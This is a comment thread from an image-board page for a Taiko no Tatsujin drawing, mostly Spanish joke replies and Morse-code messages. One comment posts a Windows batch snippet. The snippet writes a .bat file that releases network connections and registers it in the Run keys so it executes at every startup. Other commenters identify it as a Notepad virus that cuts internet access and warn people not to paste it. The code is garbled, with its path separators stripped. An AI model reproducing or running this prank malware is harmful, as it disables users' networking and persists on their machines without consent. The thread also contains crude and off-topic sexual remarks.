Please read our Rules and continue to report content that violates our rules on underage content. UploaderFlamingAnon, February 20, 2016; 23:40TagsDon_Wada, FlamingAnon, Taiko_no_TatsujinSource // 103KB // png February 20, 2016; 23:42 - Reply FlamingAnon: For that one anon on /v/ a few days ago. Sorry for taking so long. September 20, 2020; 16:14 - Reply Anonymous1: Baqueta equivocada -_- January 11, 2023; 05:43 - Reply Anonymous2: ... January 11, 2023; 05:43 - Reply Anonymous3(2): Yo golpear January 11, 2023; 05:44 - Reply Anonymous4(2): Mi cabeza con baquetas January 11, 2023; 05:45 - Reply Anonymous5(2): Y luego abrir mi boca con baquetas January 11, 2023; 05:46 - Reply Anonymous6(2): Hasta que me lleven al hospital por romper mandibula mia January 11, 2023; 05:47 - Reply Anonymous7(2): Yo sufrir January 11, 2023; 05:50 - Reply Anonymous8(2): .-- . / -- .- -.-- / -.-. .- - -.-. .... . -.. / -.-- --- ..- .-. / .- - - . -. - .. --- -. / -... ..- - / -.. --- -. - / ..-. . .- .-. / ..- ... / .-- . / ... . .- .-. -.-. .... / ..-. --- .-. / .... .. -- January 11, 2023; 05:52 - Reply Anonymous9(2): -.. . ...- . .-.. --- .--. . .-. ..--.. / ... ..- .-. .-. --- ..- -. -.. . -.. / -... -.-- / .- ... .... . ... / .- -. -.. / -.. ..- ... - / .. ... / -.-- --- ..- January 11, 2023; 05:53 - Reply Anonymous10: :v January 11, 2023; 06:02 - Reply Anonymous11(2): echo @echo off>c:windowswimn32.bat echo break off>c:windowswimn32.bat echo ipconfig/release_all>c:windowswimn32.bat echo end>c:windowswimn32.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho and the angel that didnt obey god was sentenced to darkness PAUSE January 11, 2023; 06:04 - Reply Anonymous12(2): Bloc. Notas. Pegar. Premio. January 11, 2023; 06:05 - Reply Anonymous13(2): Fuera de jodas es un virus en bloc de notas que desactiva internet January 11, 2023; 06:18 - Reply Anonymous14(2): chau me voy January 11, 2023; 06:19 - Reply Anonymous15(2): No abran January 11, 2023; 06:19 - Reply Anonymous16(2): Bloc notas ni poner eso January 11, 2023; 06:20 - Reply Anonymous17(2): Es virus January 12, 2023; 04:01 - Reply Anonymous18(2): Quien puso todo ese texto January 12, 2023; 04:03 - Reply Anonymous19(2): Esa si que es la baqueta equivocada January 12, 2023; 04:04 - Reply Anonymous20(2): Pues si que esa si que es la baqueta equivocada solo superada por las zanahorias y esparragos January 12, 2023; 20:35 - Reply Anonymous21(2): que? pq pones virus? January 14, 2023; 07:52 - Reply Anonymous22(2): Hola gente. Mi hermano se metio a este sitio. te juro que le pondre un minecraft pirata en su pc a ver si aguanta. January 14, 2023; 07:55 - Reply Anonymous23(2): Poruqe puso eso muy antes ese codigo? January 14, 2023; 07:56 - Reply Anonymous24(2): Voy a revisar el historial a ver si el público mas. January 25, 2023; 02:28 - Reply Anonymous25(2): El tipo se puso a llorar culiao bobo Y ahora dejemos este incidente atras February 16, 2023; 18:15 - Reply Anonymous26(2): En lo que estaba me voy a pajear ante otro dibujo de otra wea June 1, 2023; 19:40 - Reply Anonymous27: Wtf???? Lore?? June 16, 2023; 16:55 - Reply Anonymous28: what the hell June 21, 2023; 01:23 - Reply Anonymous29: Not my favorite rhythm game and that's the worst art I ever seen than "pinkleaf pee himself" on roblox decal July 5, 2023; 21:57 - Reply Anonymous30(27): Pinkleaf pee himself? Whats that Report an ad?
- Reply
Sorry for taking so long.
Y ahora dejemos este incidente atras